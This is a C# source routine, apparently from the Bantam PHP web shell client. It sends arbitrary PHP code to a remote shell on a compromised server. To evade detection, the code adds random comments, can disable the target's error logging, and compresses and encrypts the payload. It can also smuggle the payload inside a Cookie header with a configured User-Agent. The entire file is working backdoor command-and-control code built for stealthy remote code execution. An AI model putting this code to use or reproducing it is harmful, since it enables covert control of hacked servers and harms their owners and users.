/// <summary>
/// Main PHP execution routine, builds and executes php
/// </summary>
/// <param name="url"></param>
/// <param name="phpCodeIn"></param>
/// <param name="disableEncryption"></param>
/// <returns></returns>
public static async Task <ResponseObject> ExecuteRemotePHP(string url, string phpCodeIn, bool disableEncryption = false)
{
string ResponseEncryptionKey = string.Empty,
ResponseEncryptionIV = string.Empty,
requestEncryptionIV_VarName = string.Empty,
requestEncryptionIV = string.Empty;
bool sendViaCookie = BantamMain.Shells[url].SendDataViaCookie;
bool gzipRequestData = BantamMain.Shells[url].GzipRequestData;
bool encryptResponse = BantamMain.Shells[url].ResponseEncryption;
int ResponseEncryptionMode = BantamMain.Shells[url].ResponseEncryptionMode;
bool encryptRequest = BantamMain.Shells[url].RequestEncryption;
bool sendRequestEncryptionIV = BantamMain.Shells[url].SendRequestEncryptionIV;
string requestArgsName = BantamMain.Shells[url].RequestArgName;
string phpCode = PhpBuilder.RandomPHPComment() + phpCodeIn + PhpBuilder.RandomPHPComment();
if (string.IsNullOrEmpty(phpCode))
{
LogHelper.AddShellLog(url, "Attempted to execute empty/null code...", LogHelper.LOG_LEVEL.WARNING);
return(new ResponseObject(string.Empty, string.Empty, string.Empty));
}
try {
if (encryptResponse && !disableEncryption)
{
phpCode += PhpBuilder.EncryptPhpVariableAndEcho(ResponseEncryptionMode, ref ResponseEncryptionKey, ref ResponseEncryptionIV);
}
if (Config.DisableErrorLogs)
{
phpCode = PhpBuilder.DisableErrorLogging() + phpCode;
}
if (Config.MaxExecutionTime)
{
phpCode = PhpBuilder.MaxExecutionTime() + phpCode;
}
phpCode = Helper.MinifyCode(phpCode);
byte[] phpCodeBytes = Encoding.UTF8.GetBytes(phpCode);
if (gzipRequestData)
{
phpCodeBytes = GzCompress(phpCodeBytes);
}
if (encryptRequest)
{
string encryptionKey = BantamMain.Shells[url].RequestEncryptionKey;
if (sendRequestEncryptionIV)
{
requestEncryptionIV = CryptoHelper.GetRandomEncryptionIV();
requestEncryptionIV_VarName = BantamMain.Shells[url].RequestEncryptionIVRequestVarName;
phpCode = CryptoHelper.EncryptBytesToRJ256ToBase64(phpCodeBytes, encryptionKey, requestEncryptionIV);
}
else
{
string encryptionIV = BantamMain.Shells[url].RequestEncryptionIV;
phpCode = CryptoHelper.EncryptBytesToRJ256ToBase64(phpCodeBytes, encryptionKey, encryptionIV);
}
}
else
{
phpCode = Convert.ToBase64String(phpCodeBytes);
}
phpCode = HttpUtility.UrlEncode(phpCode);
var request = new HttpRequestMessage {
RequestUri = new Uri(url)
};
request.Headers.TryAddWithoutValidation("User-Agent", Config.DefaultUserAgent);
if (sendViaCookie)
{
request.Method = HttpMethod.Get;
if (phpCode.Length > Config.MaxCookieSizeB)
{
LogHelper.AddShellLog(url, "Attempted to execute a request larger than Max Cookie Size...", LogHelper.LOG_LEVEL.ERROR);
return(new ResponseObject(string.Empty, string.Empty, string.Empty));
}
request.Headers.TryAddWithoutValidation("Cookie", requestArgsName + "=" + phpCode);
if (encryptRequest && sendRequestEncryptionIV)
{
request.Headers.TryAddWithoutValidation("Cookie,", requestEncryptionIV_VarName + "=" + HttpUtility.UrlEncode(requestEncryptionIV));
}
}
else
{
request.Method = HttpMethod.Post;
string postArgs = string.Empty;
if (encryptRequest && sendRequestEncryptionIV)
{
postArgs = string.Format(requestArgsName + "={0}&{1}={2}", phpCode, requestEncryptionIV_VarName, HttpUtility.UrlEncode(requestEncryptionIV));
}
else
{
postArgs = string.Format(requestArgsName + "={0}", phpCode);
}
int maxPostSizeBytes = (Config.MaxPostSizeKib * 1000);
if (postArgs.Length > maxPostSizeBytes)
{
LogHelper.AddShellLog(url, "Attempted to execute request larger than Post Size Max...", LogHelper.LOG_LEVEL.ERROR);
return(new ResponseObject(string.Empty, string.Empty, string.Empty));
}
request.Content = new StringContent(postArgs, Encoding.UTF8, "application/x-www-form-urlencoded");
}
using (HttpResponseMessage response = await client.SendAsync(request, HttpCompletionOption.ResponseHeadersRead)) {
var responseString = await response.Content.ReadAsStringAsync();
return(new ResponseObject(responseString, ResponseEncryptionKey, ResponseEncryptionIV));
}
}
catch (System.Net.Http.HttpRequestException e) {
LogHelper.AddShellLog(url, "Exception caught while executing php. [" + e.Message + "]", LogHelper.LOG_LEVEL.ERROR);
}
catch (Exception e) {
LogHelper.AddShellLog(url, "Exception caught while executing php. [" + e.Message + "]", LogHelper.LOG_LEVEL.ERROR);
}
return(new ResponseObject(string.Empty, string.Empty, string.Empty));
}
